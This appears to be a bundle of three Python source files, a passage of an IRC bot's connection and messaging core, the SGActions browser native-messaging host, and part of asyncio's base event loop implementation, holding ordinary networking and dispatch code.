data = unicode(data, encoding='iso8859-1')
except:
# Discard line if encoding is unknown
return
if data:
self.log_raw(data, '<<')
self.buffer += data
def found_terminator(self):
line = self.buffer
if line.endswith('\r'):
line = line[:-1]
self.buffer = ''
self.raw = line
# Break off IRCv3 message tags, if present
tags = {}
if line.startswith('@'):
tagstring, line = line.split(' ', 1)
for tag in tagstring[1:].split(';'):
tag = tag.split('=', 1)
if len(tag) > 1:
tags[tag[0]] = tag[1]
else:
tags[tag[0]] = None
if line.startswith(':'):
source, line = line[1:].split(' ', 1)
else:
source = None
if ' :' in line:
argstr, text = line.split(' :', 1)
args = argstr.split(' ')
args.append(text)
else:
args = line.split(' ')
text = args[-1]
self.last_ping_time = datetime.now()
if args[0] == 'PING':
self.write(('PONG', text))
elif args[0] == 'ERROR':
self.debug(__file__, text, 'always')
if self.hasquit:
self.close_when_done()
elif args[0] == '433':
stderr('Nickname already in use!')
self.handle_close()
origin = Origin(self, source, args, tags)
self.dispatch(origin, text, args)
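    # Worked example (added comment, not in the original source): a raw line
    # such as
    #   @time=2014-01-01T00:00:00Z :nick!user@host PRIVMSG #chan :hello there
    # is split by the code above into tags={'time': '2014-01-01T00:00:00Z'},
    # source='nick!user@host', args=['PRIVMSG', '#chan', 'hello there'] and
    # text='hello there' before being handed to dispatch().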
def dispatch(self, origin, text, args):
pass
def msg(self, recipient, text, max_messages=1):
# We're arbitrarily saying that the max is 400 bytes of text when
        # messages will be split. Otherwise, we'd have to account for the bot's
# hostmask, which is hard.
max_text_length = 400
        # Encode to bytes for proper length calculation
if isinstance(text, unicode):
encoded_text = text.encode('utf-8')
else:
encoded_text = text
excess = ''
if max_messages > 1 and len(encoded_text) > max_text_length:
last_space = encoded_text.rfind(' ', 0, max_text_length)
if last_space == -1:
excess = encoded_text[max_text_length:]
encoded_text = encoded_text[:max_text_length]
else:
excess = encoded_text[last_space + 1:]
encoded_text = encoded_text[:last_space]
# We'll then send the excess at the end
# Back to unicode again, so we don't screw things up later.
text = encoded_text.decode('utf-8')
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
            # Otherwise, wait so it's been at least 0.7 seconds + penalty
recipient_id = Nick(recipient)
if recipient_id not in self.stack:
self.stack[recipient_id] = []
elif self.stack[recipient_id]:
elapsed = time.time() - self.stack[recipient_id][-1][0]
if elapsed < 3:
penalty = float(max(0, len(text) - 50)) / 70
wait = 0.7 + penalty
if elapsed < wait:
time.sleep(wait - elapsed)
# Loop detection
messages = [m[1] for m in self.stack[recipient_id][-8:]]
                # If what we're about to send was repeated at least 5 times
                # in the last 2 minutes, replace it with '...'
if messages.count(text) >= 5 and elapsed < 120:
text = '...'
if messages.count('...') >= 3:
# If we said '...' 3 times, discard message
return
self.write(('PRIVMSG', recipient), text)
self.stack[recipient_id].append((time.time(), self.safe(text)))
self.stack[recipient_id] = self.stack[recipient_id][-10:]
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
def notice(self, dest, text):
"""Send an IRC NOTICE to a user or a channel.
See IRC protocol documentation for more information.
"""
self.write(('NOTICE', dest), text)
def error(self, origin=None, trigger=None):
"""Called internally when a module causes an error."""
try:
trace = traceback.format_exc()
if sys.version_info.major < 3:
trace = trace.decode('utf-8', errors='xmlcharrefreplace')
stderr(trace)
try:
lines = list(reversed(trace.splitlines()))
report = [lines[0].strip()]
for line in lines:
line = line.strip()
if line.startswith('File "'):
report.append(line[0].lower() + line[1:])
break
else:
report.append('source unknown')
signature = '%s (%s)' % (report[0], report[1])
# TODO: make not hardcoded
log_filename = os.path.join(self.config.logdir, 'exceptions.log')
with codecs.open(log_filename, 'a', encoding='utf-8') as logfile:
logfile.write('Signature: %s\n' % signature)
if origin:
logfile.write('from %s at %s:\n' % (origin.sender, str(datetime.now())))
if trigger:
logfile.write('Message was: <%s> %s\n' % (trigger.nick, trigger.group(0)))
logfile.write(trace)
logfile.write(
'----------------------------------------\n\n'
)
except Exception as e:
stderr("Could not save full traceback!")
self.debug(__file__, "(From: " + origin.sender + "), can't save traceback: " + str(e), 'always')
if origin:
self.msg(origin.sender, signature)
except Exception as e:
if origin:
self.msg(origin.sender, "Got an error.")
self.debug(__file__, "(From: " + origin.sender + ") " + str(e), 'always')
def handle_error(self):
"""Handle any uncaptured error in the core.
Overrides asyncore's handle_error.
"""
trace = traceback.format_exc()
stderr(trace)
self.debug(
__file__,
'Fatal error in core, please review exception log',
'always'
)
# TODO: make not hardcoded
logfile = codecs.open(
os.path.join(self.config.logdir, 'exceptions.log'),
'a',
encoding='utf-8'
)
logfile.write('Fatal error in core, handle_error() was called\n')
logfile.write('last raw line was %s' % self.raw)
logfile.write(trace)
logfile.write('Buffer:\n')
logfile.write(self.buffer)
logfile.write('----------------------------------------\n\n')
logfile.close()
if self.error_count > 10:
if (datetime.now() - self.last_error_timestamp).seconds < 5:
                print("Too many errors, can't continue", file=sys.stderr)
os._exit(1)
self.last_error_timestamp = datetime.now()
self.error_count = self.error_count + 1
if self.config.exit_on_error:
os._exit(1)
# Helper functions to maintain the oper list.
# They cast to Nick when adding to be quite sure there aren't any accidental
# string nicks. On deletion, you know you'll never need to worry about what
# the real superclass is, so we just cast and remove.
def add_op(self, channel, name):
if isinstance(name, Nick):
self.ops[channel].add(name)
else:
self.ops[channel].add(Nick(name))
def add_halfop(self, channel, name):
if isinstance(name, Nick):
self.halfplus[channel].add(name)
else:
self.halfplus[channel].add(Nick(name))
def add_voice(self, channel, name):
if isinstance(name, Nick):
self.voices[channel].add(name)
else:
self.voices[channel].add(Nick(name))
def del_op(self, channel, name):
self.ops[channel].discard(Nick(name))
def del_halfop(self, channel, name):
self.halfplus[channel].discard(Nick(name))
def del_voice(self, channel, name):
self.voices[channel].discard(Nick(name))
def flush_ops(self, channel):
self.ops[channel] = set()
self.halfplus[channel] = set()
self.voices[channel] = set()
def init_ops_list(self, channel):
if channel not in self.halfplus:
self.halfplus[channel] = set()
if channel not in self.ops:
self.ops[channel] = set()
if channel not in self.voices:
self.voices[channel] = set()
|
core.py
|
#!/usr/bin/env python
from Queue import Queue
from warnings import warn
import functools
import json
import os
import re
import struct
import subprocess
import sys
import threading
import traceback
import weakref
from sgactions.dispatch import dispatch as _dispatch
def log(*args):
sys.stderr.write('[SGActions] %s\n' % ' '.join(str(x) for x in args))
sys.stderr.flush()
# We need to keep checking for this as long as the old Firefox plugin is
# in the wild.
_line_based = os.environ.get('SGACTIONS_HOST') == 'Firefox'
_capabilities = {}
_handlers = {}
_threads = weakref.WeakValueDictionary()
_local = threading.local()
def reply(orig, **msg):
msg['dst'] = orig.get('src') or orig
send(**msg)
def send(**msg):
msg['src'] = 'native'
encoded_msg = json.dumps(msg)
log('send', len(encoded_msg), encoded_msg)
if _line_based:
sys.__stdout__.write(encoded_msg + '\n')
else:
sys.__stdout__.write(struct.pack('I', len(encoded_msg)))
sys.__stdout__.write(encoded_msg)
sys.__stdout__.flush()
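# Added note (not in the original module): when not line-based, messages are
# framed the way main() below expects to read them -- a 4-byte native-order
# unsigned length prefix (struct format 'I') followed by the JSON payload --
# which mirrors the framing used by the browser-side native messaging host.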
def format_exception(e):
return dict(type='error', error_type=e.__class__.__name__, error=str(e))
def reply_exception(orig, e):
reply(orig, **format_exception(e))
def handler(func, name=None):
if isinstance(func, basestring):
return functools.partial(handler, name=func)
_handlers[name or func.__name__] = func
return func
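# A minimal usage sketch (not part of the original module): `handler` can be
# applied bare, registering the function under its own name, or called with an
# explicit message-type string. Wrapping the examples in a function keeps them
# out of the real _handlers registry unless it is deliberately called.
def _handler_usage_example():
    @handler
    def goodbye(**kw):
        # registered as 'goodbye'
        reply(kw, type='ack')

    @handler('custom-type')
    def custom(**kw):
        # registered as 'custom-type'
        reply(kw, type='ack')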
@handler
def hello(capabilities=None, **kw):
_capabilities.update(capabilities or {})
reply(kw,
type='elloh',
capabilities={'dispatch': True},
executable=sys.executable,
script=__file__,
native=os.environ.get('SGACTIONS_NATIVE'),
origin=os.environ.get('SGACTIONS_ORIGIN'),
host=os.environ.get('SGACTIONS_HOST'),
)
@handler
def elloh(**kw):
pass
@handler
def ping(**req):
res = req.copy()
res['type'] = 'pong'
    reply(req, **res)
@handler
def pong(**kw):
pass
@handler
def dispatch(entrypoint=None, kwargs=None, url=None, **kw):
# We must respect the old URL method until the legacy Chrome/Firefox addon is gone.
log('dispatching:', entrypoint or url)
res = _dispatch(entrypoint=entrypoint, kwargs=kwargs, url=url, reload=None)
if isinstance(res, Exception):
reply_exception(kw, res)
else:
reply(kw, type='result', result=res)
def send_and_recv(**kwargs):
session = current_session()
queue = session.get('result_queue')
if not queue:
queue = session['result_queue'] = Queue(1)
timeout = kwargs.pop('timeout', 300)
send(dst=session['src'], session_token=session['token'], **kwargs)
reply = queue.get(timeout=timeout)
log('async response:', repr(reply))
return reply
@handler
def user_response(session_token, **kw):
thread = _threads.get(session_token)
if not thread:
raise ValueError('no matching thread', session_token)
session = thread.session
queue = session.get('result_queue')
if not queue:
raise ValueError('session not expecting result', session_token)
queue.put(kw, block=False)
def main():
# We need to take over stdout so that print statements don't result in the
# browser thinking it is getting a message back.
sys.stdout = open('/tmp/sgactions.native.log', 'a')
dispatch_counter = 0
log('entering main loop')
while True:
try:
if _line_based:
raw_msg = sys.stdin.readline()
if not raw_msg:
log('native port closed')
break
else:
raw_size = sys.stdin.read(4)
if not raw_size:
log('native port closed')
break
size, = struct.unpack('I', raw_size)
                log('reading message of size', size)
raw_msg = sys.stdin.read(size)
msg = json.loads(raw_msg)
except Exception as e:
traceback.print_exc()
send(**format_exception(e))
continue
if len(_threads):
log('%d sessions already open' % len(_threads))
        if msg.get('type') not in _handlers:
            reply(msg, type='error', error='unknown message type %r' % msg.get('type'))
            log('unknown message type: %s' % msg.get('type'))
            continue
dispatch_counter += 1
thread = _threads[dispatch_counter] = threading.Thread(target=_dispatch_target, args=[msg])
thread.daemon = True
thread.session = {
'type': msg['type'],
'src': msg.get('src'),
'token': dispatch_counter,
}
thread.start()
del thread # Kill this reference immediately.
def current_session(strict=True):
try:
return threading.current_thread().session
except AttributeError:
if strict:
raise RuntimeError('no current native handler')
def _dispatch_target(msg):
try:
_handlers[msg['type']](**msg)
except Exception as e:
traceback.print_exc()
try:
reply_exception(msg, e)
except Exception as e:
# Just in case it is the exception reporting mechanism...
log('exception during reply_exception')
traceback.print_exc()
|
base_events.py
|
"""Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import functools
import heapq
import itertools
import os
import socket
import stat
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import exceptions
from . import futures
from . import protocols
from . import sslproto
from . import staggered
from . import tasks
from . import transports
from . import trsock
from .log import logger
__all__ = 'BaseEventLoop', 'Server'
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
def _interleave_addrinfos(addrinfos, first_address_family_count=1):
"""Interleave list of addrinfo tuples by family."""
# Group addresses by family
addrinfos_by_family = collections.OrderedDict()
for addr in addrinfos:
family = addr[0]
if family not in addrinfos_by_family:
addrinfos_by_family[family] = []
addrinfos_by_family[family].append(addr)
addrinfos_lists = list(addrinfos_by_family.values())
reordered = []
if first_address_family_count > 1:
reordered.extend(addrinfos_lists[0][:first_address_family_count - 1])
del addrinfos_lists[0][:first_address_family_count - 1]
reordered.extend(
a for a in itertools.chain.from_iterable(
itertools.zip_longest(*addrinfos_lists)
) if a is not None)
return reordered
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, (SystemExit, KeyboardInterrupt)):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
def _check_ssl_socket(sock):
if ssl is not None and isinstance(sock, ssl.SSLSocket):
raise TypeError("Socket cannot be of type SSLSocket")
class _SendfileFallbackProtocol(protocols.Protocol):
def __init__(self, transp):
if not isinstance(transp, transports._FlowControlMixin):
raise TypeError("transport should be _FlowControlMixin instance")
self._transport = transp
self._proto = transp.get_protocol()
self._should_resume_reading = transp.is_reading()
self._should_resume_writing = transp._protocol_paused
transp.pause_reading()
transp.set_protocol(self)
if self._should_resume_writing:
self._write_ready_fut = self._transport._loop.create_future()
else:
self._write_ready_fut = None
async def drain(self):
if self._transport.is_closing():
raise ConnectionError("Connection closed by peer")
fut = self._write_ready_fut
if fut is None:
return
await fut
def connection_made(self, transport):
raise RuntimeError("Invalid state: "
"connection should have been established already.")
def connection_lost(self, exc):
if self._write_ready_fut is not None:
            # Never happens if peer disconnects after sending the whole content.
            # Thus disconnection is always an exception from the user's perspective.
if exc is None:
self._write_ready_fut.set_exception(
ConnectionError("Connection is closed by peer"))
else:
self._write_ready_fut.set_exception(exc)
self._proto.connection_lost(exc)
def pause_writing(self):
if self._write_ready_fut is not None:
return
self._write_ready_fut = self._transport._loop.create_future()
def resume_writing(self):
if self._write_ready_fut is None:
return
self._write_ready_fut.set_result(False)
self._write_ready_fut = None
def data_received(self, data):
raise RuntimeError("Invalid state: reading should be paused")
def eof_received(self):
raise RuntimeError("Invalid state: reading should be paused")
async def restore(self):
self._transport.set_protocol(self._proto)
if self._should_resume_reading:
self._transport.resume_reading()
if self._write_ready_fut is not None:
# Cancel the future.
# Basically it has no effect because protocol is switched back,
# no code should wait for it anymore.
self._write_ready_fut.cancel()
if self._should_resume_writing:
self._proto.resume_writing()
class Server(events.AbstractServer):
def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
ssl_handshake_timeout, ssl_shutdown_timeout=None):
self._loop = loop
self._sockets = sockets
self._active_count = 0
self._waiters = []
self._protocol_factory = protocol_factory
self._backlog = backlog
self._ssl_context = ssl_context
self._ssl_handshake_timeout = ssl_handshake_timeout
self._ssl_shutdown_timeout = ssl_shutdown_timeout
self._serving = False
self._serving_forever_fut = None
def __repr__(self):
return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
def _attach(self):
assert self._sockets is not None
self._active_count += 1
def _detach(self):
assert self._active_count > 0
self._active_count -= 1
if self._active_count == 0 and self._sockets is None:
self._wakeup()
def _wakeup(self):
waiters = self._waiters
self._waiters = None
for waiter in waiters:
if not waiter.done():
waiter.set_result(waiter)
def _start_serving(self):
if self._serving:
return
self._serving = True
for sock in self._sockets:
sock.listen(self._backlog)
self._loop._start_serving(
self._protocol_factory, sock, self._ssl_context,
self, self._backlog, self._ssl_handshake_timeout,
self._ssl_shutdown_timeout)
def get_loop(self):
return self._loop
def is_serving(self):
return self._serving
@property
def sockets(self):
if self._sockets is None:
return ()
return tuple(trsock.TransportSocket(s) for s in self._sockets)
def close(self):
sockets = self._sockets
if sockets is None:
return
self._sockets = None
for sock in sockets:
self._loop._stop_serving(sock)
self._serving = False
if (self._serving_forever_fut is not None and
not self._serving_forever_fut.done()):
self._serving_forever_fut.cancel()
self._serving_forever_fut = None
if self._active_count == 0:
self._wakeup()
async def start_serving(self):
self._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0)
async def serve_forever(self):
if self._serving_forever_fut is not None:
raise RuntimeError(
f'server {self!r} is already being awaited on serve_forever()')
if self._sockets is None:
raise RuntimeError(f'server {self!r} is closed')
self._start_serving()
self._serving_forever_fut = self._loop.create_future()
try:
await self._serving_forever_fut
except exceptions.CancelledError:
try:
self.close()
await self.wait_closed()
finally:
raise
finally:
self._serving_forever_fut = None
async def wait_closed(self):
if self._sockets is None or self._waiters is None:
return
waiter = self._loop.create_future()
self._waiters.append(waiter)
await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
        # In debug mode, if the execution of a callback or a step of a task
        # exceeds this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
# Set to True when `loop.shutdown_default_executor` is called.
self._executor_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
"""Create a Future object attached to the loop."""
return futures.Future(loop=self)
def create_task(self, coro, *, name=None, context=None):
"""Schedule a coroutine object.
Return a task object.
"""
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self, name=name, context=context)
if task._source_traceback:
del task._source_traceback[-1]
else:
if context is None:
# Use legacy API if context is not needed
task = self._task_factory(self, coro)
else:
task = self._task_factory(self, coro, context=context)
tasks._set_task_name(task, name)
return task
def set_task_factory(self, factory):
"""Set a task factory that will be used by loop.create_task().
If factory is None the default task factory will be set.
If factory is a callable, it should have a signature matching
'(loop, coro)', where 'loop' will be a reference to the active
event loop, 'coro' will be a coroutine object. The callable
must return a Future.
"""
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
"""Return a task factory, or None if the default one is in use."""
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
"""Create socket transport."""
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None,
call_connection_made=True):
"""Create SSL transport."""
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
"""Create datagram transport."""
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create read pipe transport."""
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create write pipe transport."""
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
"""Create subprocess transport."""
raise NotImplementedError
def _write_to_self(self):
"""Write a byte to self-pipe, to wake up the event loop.
This may be called from a different thread.
The subclass is responsible for implementing the self-pipe.
"""
raise NotImplementedError
def _process_events(self, event_list):
"""Process selector events."""
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _check_default_executor(self):
if self._executor_shutdown_called:
raise RuntimeError('Executor shutdown has been called')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
"""Shutdown all active asynchronous generators."""
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
# generators alive.
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks.gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
async def shutdown_default_executor(self):
"""Schedule the shutdown of the default executor."""
self._executor_shutdown_called = True
if self._default_executor is None:
return
future = self.create_future()
thread = threading.Thread(target=self._do_shutdown, args=(future,))
thread.start()
try:
await future
finally:
thread.join()
def _do_shutdown(self, future):
try:
self._default_executor.shutdown(wait=True)
self.call_soon_threadsafe(future.set_result, None)
except Exception as ex:
self.call_soon_threadsafe(future.set_exception, ex)
def _check_running(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
"""Run until stop() is called."""
self._check_closed()
self._check_running()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
"""Run until the Future is done.
If the argument is a coroutine, it is wrapped in a Task.
WARNING: It would be disastrous to call run_until_complete()
with the same coroutine twice -- it would wrap it in two
different Tasks and that can't be good.
Return the Future's result, or raise its exception.
"""
self._check_closed()
self._check_running()
new_task = not futures.isfuture(future)
future = tasks.ensure_future(future, loop=self)
if new_task:
# An exception is raised if the future didn't complete, so there
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
# local task.
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
"""Stop running the event loop.
Every callback already scheduled will still run. This simply informs
run_forever to stop looping after a complete iteration.
"""
self._stopping = True
def close(self):
"""Close the event loop.
This clears the queues and shuts down the executor,
but does not wait for the executor to finish.
The event loop must not be running.
"""
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
self._executor_shutdown_called = True
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
"""Returns True if the event loop was closed."""
return self._closed
def __del__(self, _warn=warnings.warn):
if not self.is_closed():
_warn(f"unclosed event loop {self!r}", ResourceWarning, source=self)
if not self.is_running():
self.close()
def is_running(self):
"""Returns True if the event loop is running."""
return (self._thread_id is not None)
def time(self):
"""Return the time according to the event loop's clock.
This is a float expressed in seconds since an epoch, but the
epoch, precision, accuracy and drift are unspecified and may
differ per event loop.
"""
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
"""Arrange for a callback to be called at a given time.
Return a Handle: an opaque object with a cancel() method that
can be used to cancel the call.
The delay can be an int or float, expressed in seconds. It is
always relative to the current time.
Each callback will be called exactly once. If two callbacks
        are scheduled for exactly the same time, it is undefined which
will be called first.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
if delay is None:
raise TypeError('delay must not be None')
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
def call_at(self, when, callback, *args, context=None):
"""Like call_later(), but uses an absolute time.
Absolute time corresponds to the event loop's time() method.
"""
if when is None:
raise TypeError("when cannot be None")
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_at')
timer = events.TimerHandle(when, callback, args, self, context)
if timer._source_traceback:
del timer._source_traceback[-1]
heapq.heappush(self._scheduled, timer)
timer._scheduled = True
return timer
def call_soon(self, callback, *args, context=None):
"""Arrange for a callback to be called as soon as possible.
This operates as a FIFO queue: callbacks are called in the
order in which they are registered. Each callback will be
called exactly once.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
"""Check that the current thread is the thread running the event loop.
Non-thread-safe methods of this class make this assumption and will
likely behave incorrectly when the assumption is violated.
Should only be called when (self._debug == True). The caller is
responsible for checking this condition for performance reasons.
"""
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
"""Like call_soon(), but thread-safe."""
self._check_closed()
if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._write_to_self()
return handle
def run_in_executor(self, executor, func, *args):
self._check_closed()
if self._debug:
self._check_callback(func, 'run_in_executor')
if executor is None:
executor = self._default_executor
# Only check when the default executor is being used
self._check_default_executor()
if executor is None:
executor = concurrent.futures.ThreadPoolExecutor(
thread_name_prefix='asyncio'
)
self._default_executor = executor
return futures.wrap_future(
executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
if not isinstance(executor, concurrent.futures.ThreadPoolExecutor):
raise TypeError('executor must be ThreadPoolExecutor instance')
self._default_executor = executor
def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
msg = [f"{host}:{port!r}"]
if family:
msg.append(f'family={family!r}')
if type:
msg.append(f'type={type!r}')
if proto:
msg.append(f'proto={proto!r}')
if flags:
msg.append(f'flags={flags!r}')
msg = ', '.join(msg)
logger.debug('Get address info %s', msg)
t0 = self.time()
addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
dt = self.time() - t0
msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
if dt >= self.slow_callback_duration:
logger.info(msg)
else:
logger.debug(msg)
return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
return await self.run_in_executor(
None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
_check_ssl_socket(sock)
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
